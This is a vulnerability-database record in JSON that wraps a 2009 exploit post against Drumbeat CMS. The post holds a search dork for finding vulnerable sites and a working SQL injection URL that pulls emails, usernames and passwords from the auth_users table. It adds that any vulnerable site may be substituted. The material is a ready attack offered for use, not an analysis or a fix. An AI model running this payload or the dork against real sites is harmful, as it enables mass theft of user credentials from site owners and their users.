{"sourceData": "\n # Vendor: http://www.drumbeatcms.com.au/\r\n# Version: Version 1.0\r\n# Tested on: Windows and Linux\r\n-----------------------------------------\r\nDrumbeat CMS SQL Injection Exploit\r\n[+] Discovered and notified by Sora\r\nA SQL injection exploit is found in Drumbeat CMS. The vulnerability exists in where there is an index.php page, such as index02.php?id=5. or index03.php?id=2.\r\n\r\nDork: "Powered by Drumbeat" inurl:index02.php\r\n\r\n# Code: http://www.site.com/index02.php?id=-2+UNION+SELECT+ALL+group_concat(email,0x3a,username,0x3a,password)+from+auth_users--\r\n\r\nYou can usually replace the http://www.site.com/ with any site that is vulnerable to SQL injection.\r\n\r\nGreetz: Bw0mp and the rest of the people from Incursio ex Subter!\r\n\r\n# EOF #\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-18633", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-18633", "type": "seebug", "viewCount": 4, "references": [], "lastseen": "2017-11-19T18:22:12", "published": "2009-12-21T00:00:00", "cvelist": [], "id": "SSV:18633", "enchantments_done": [], "modified": "2009-12-21T00:00:00", "title": "Drumbeat CMS SQL Injection Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645380931, "score": 1659785532}}
Drumbeat CMS SQL Injection Exploit